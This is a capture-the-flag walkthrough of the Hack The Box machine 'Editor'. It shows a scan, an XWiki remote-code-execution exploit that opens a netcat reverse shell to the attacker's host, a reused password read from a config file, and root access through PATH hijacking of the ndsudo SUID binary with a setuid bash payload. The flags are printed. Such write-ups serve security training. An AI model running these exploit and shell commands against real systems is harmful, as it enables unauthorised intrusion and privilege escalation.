HTB Linux Easy: Editor
Editor is an Easy rated Linux machine on HTB.
Nmap Scan
Nmap scan report for 10.10.11.80
Host is up (0.016s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editor.htb/
8080/tcp open http Jetty 10.0.20
|_http-open-proxy: Proxy might be redirecting requests
| http-title: XWiki - Main - Intro
|_Requested resource was http://10.10.11.80:8080/xwiki/bin/view/Main/
|_http-server-header: Jetty(10.0.20)
| http-cookie-flags:
| /:
| JSESSIONID:
|_ httponly flag not set
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/
|_/xwiki/bin/undelete/
| http-methods:
|_ Potentially risky methods: PROPFIND LOCK UNLOCK
| http-webdav-scan:
| Server Type: Jetty(10.0.20)
| WebDAV type: Unknown
|_ Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Modify hosts file:
10.10.11.80 editor.htb
Enumerate HTTP (Port 80)
Found redirect to: http://wiki.editor.htb:
# Hosts file
10.10.11.80 editor.htb wiki.editor.htb
The footer here reveals the use of the following software: XWiki Debian 15.10.8. Googling this particular version reveals a PoC RCE exploit: Link
Shell as the xwiki user:
python3 CVE-2025-24893.py -t 'http://10.10.11.80:8080' -c 'busybox nc 10.10.14.95 80 -e /bin/bash'
# Shell
nc -lnvp 80
listening on [any] 80 ...
connect to [10.10.14.95] from (UNKNOWN) [10.10.11.80] 59926
id
uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)
Lateral movement
Asking Mistral AI where XWiki commonly stores credentials reveals the following locations:
/etc/xwiki/hibernate.cfg.xml
/var/lib/xwiki/WEB-INF/hibernate.cfg.xml
Looking through the filesystem for the hibernate.cfg.xml file:
find / -name hibernate.cfg.xml 2>/dev/null
/etc/xwiki/hibernate.cfg.xml
/usr/lib/xwiki/WEB-INF/hibernate.cfg.xml
/usr/share/xwiki/templates/mysql/hibernate.cfg.xml
The database connection password in this file turns out to be reused by the oliver user:
xwiki@editor:~$ cat /etc/xwiki/hibernate.cfg.xml | grep password
<property name="hibernate.connection.password">theEd1t0rTeam99</property>
SSH as oliver:
ssh oliver@10.10.11.80
oliver@10.10.11.80's password:
oliver@editor:~$ id
uid=1000(oliver) gid=1000(oliver) groups=1000(oliver),999(netdata)
# Pass: theEd1t0rTeam99
User.txt: b69101abc5fc47fa5bdce9fb659814d5
cat user.txt
b69101abc5fc47fa5bdce9fb659814d5
Privilege Escalation
Our user is a member of the netdata group, and the /opt directory also contains a netdata folder. The following binary with the SUID bit set stands out: Link
To exploit this we must supply a payload with the name of nvme:
# Prep payload
#include <unistd.h>
int main() {
setuid(0); setgid(0);
execl("/bin/bash", "bash", NULL);
return 0;
}
# Compile & rename
gcc esc.c
mv a.out nvme
# Transfer
wget http://10.10.14.95/nvme
chmod +x nvme
Modify the path variable:
export PATH=$PATH:/tmp
Become root:
oliver@editor:~$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-smart-log nvme-list --device a
root@editor:/home/oliver# id
uid=0(root) gid=0(root) groups=0(root),999(netdata),1000(oliver)
Root.txt: 456f22958180787abe8198dbde10c3da
root@editor:/root# cat root.txt
456f22958180787abe8198dbde10c3da
